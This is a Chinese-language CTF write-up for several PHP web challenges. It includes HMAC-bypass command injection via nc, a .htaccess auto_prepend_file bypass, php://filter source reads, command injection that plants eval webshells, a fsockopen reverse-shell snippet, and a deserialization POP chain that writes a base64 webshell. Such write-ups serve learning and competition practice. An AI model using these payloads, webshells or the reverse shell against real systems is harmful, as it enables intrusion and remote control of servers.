前言
- web考的是misc,之前一段时间一直忙着培训也没有时间。
BlackCat
- 源码在MP3里面,不知道这样做的意义是什么难道有人会在写网站的时候把源码放进mp3里面???这样做真的够无聊的。
- 源码
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){ die('Ë•£¡3⁄41 ̧Ò2ÈÎÒÒ»Ö»¶úμÄÎ2°Í£¡');
}
$clandestine = getenv("clandestine");
if(isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'],
$clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if($hh !== $_POST['Black-Cat-Sheriff']){ die('ÓÐÒâÃé×1⁄4£¬ÎÞÒâ»÷·¢
£¬ÄãμÄÃÎÏë3⁄4ÍÊÇÄãÒaÃé×1⁄4μÄÄ¿±ê¡£ÏàÐÅ×Ô1⁄4o£¬Äã3⁄4ÍÊÇÄÇ¿ÅÉäÖаÐÐÄμÄ×Óμ ̄¡£'); }
echo exec("nc".$_POST['One-ear']);
老知识点了,数组加密得到nu l l用null去加密得到hash值。
Black-Cat- Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One- ear=%3Bcat+flag.php&White-cat-monitor[]=1a
easyphp
原题X-NUCA‘2019 ——Ezphp
我们从代码的最后一行可见最后会强行拼接进来一个 “\nHello World” 导致 .hatccess 无法解析 500错误。所以使用反斜杠可以将 \n 转义为普通字符后使用#注释使得 .hatccess 能够成功解
析。绕过 检测同样使用
\
作为换行直接绕过该函数的关键字检测。将 .hatccess 包含进所以php文件。
php_valueauto_prepend_file.htaccess
- 综上构造payload:
php_value auto_prepend_fil\
e .htaccess
#<?php phpinfo();?>\
- exp
?content=php_valueauto_prepend_fil\%0Ae.htaccess%0A%23<?phpsystem('cat /fla'.'g');?>\&filename=.htaccess
Easyphp2
- 目测是文件包含了。
- 用base64或者rot13读文件发现被过滤了,由于
include()
可以解码一次url所以可以用双url编码绕过,这里。
- 翻阅PHP文档发现还有另外一个过滤器能用:
- 例如:
http://183.129.189.60:10021/?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php
解码:
源码:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>count is here</title>
<style>
html,
body {
overflow: none;
max-height: 100vh;
}
</style>
</head>
<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">
<center><img src="question.jpg" height="200" width="200" /> </center>
<?php
ini_set('max_execution_time', 5);
if ($_COOKIE['pass'] !== getenv('PASS')) {
setcookie('pass', 'PASS');
die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
}
?>
<h1>A Counter is here, but it has someting wrong</h1>
<form>
<input type="hidden" value="GWHT.php" name="file">
<textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
<input type="submit">
</form>
<?php
if (isset($_GET["count"])) {
$count = $_GET["count"];
if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
die('hacker!');
}
echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
}
?>
</body>
</html>
- index.php
<?php
if (isset($_GET['file'])) {
if(preg_match('/#|base64|rot13|base32|base16/i', $_GET['file'])){
die('G0-OUT'.'<br>'.'hacker!');
}
require_once($_GET['file']);
} else {
header('Location: /?file=GWHT.php');
}
密码盲猜是:
GWHT
由于过滤了
$_POST
和$_GET
直接用get_defined_vars()
代替payload如下:
http://183.129.189.60:10021/?file=GWHT.php&count=%27`echo%20%22%3C?=eval(pos(pos(get_defined_vars())))?%3E%22%3E2.php`%27
- 再写一个正常的木马,:
http://183.129.189.60:10021/2.php?a=file_put_contents('cnm.php',base64_decode("PD9waHAgZXZhbCgkX1BPU1RbYWFdKTs/Pg%3d%3d"))%3b
- 使用PHP反弹一个交互shell
<?php
$sock=fsockopen("localhost",12345);//localhost为自己的外网ip,端口任意
exec("/bin/sh -i <&3 >&3 2>&3");
?>
- 做到这里洗澡去了,回来环境关了。算了。
easyser
扫描器扫出一个robots.txt
提示:
<!-- 小胖说用个不安全的协议从我家才能进ser.php呢! !-->
- 源码:
<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';
class GWHT{
public $hero;
public function __construct(){ $this->hero = new Yasuo;
}
public function __toString(){
if (isset($this->hero)){
return $this->hero->hasaki();
}else{
return "You don't look very happy";
} }
}
class Yongen{ //flag.php
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file; $this -> text = $text;
}
public function hasaki(){
$d = '<?php die("nononon");?>'; $a= $d. $this->text;
@file_put_contents($this-> file,$a); }
}
class Yasuo{
public function hasaki(){
return "I'm the best happy windy man";
}
}/*$c=$_GET['c'];
echo $x=unserialize($c);*/
?>
- 简单的POP链
<?php
class GWHT{
public $hero;
}
class Yongen{ //flag.php
public $file = "php://filter/convert.base64-decode/resource=aaa.php";
public $text = "aaaPD9waHAgZXZhbCgkX1BPU1Rbc10pOyAgPz4=";
}
$a = new GWHT;
$a->hero = new Yongen;
echo urlencode(serialize($a));